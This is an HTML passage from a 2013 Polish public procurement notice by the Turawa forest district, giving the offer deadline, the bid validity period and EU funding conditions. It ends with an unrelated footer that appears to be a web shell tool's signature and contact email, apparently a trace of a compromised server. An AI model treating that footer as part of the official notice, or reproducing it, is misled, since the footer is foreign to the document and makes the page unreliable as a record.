ul. Opolska 35.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2013 godzina 09:30, miejsce: Sekretariat
PGLLP Nadleśnictwo Turawa
46-045 Turawa
ul. Opolska 35.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com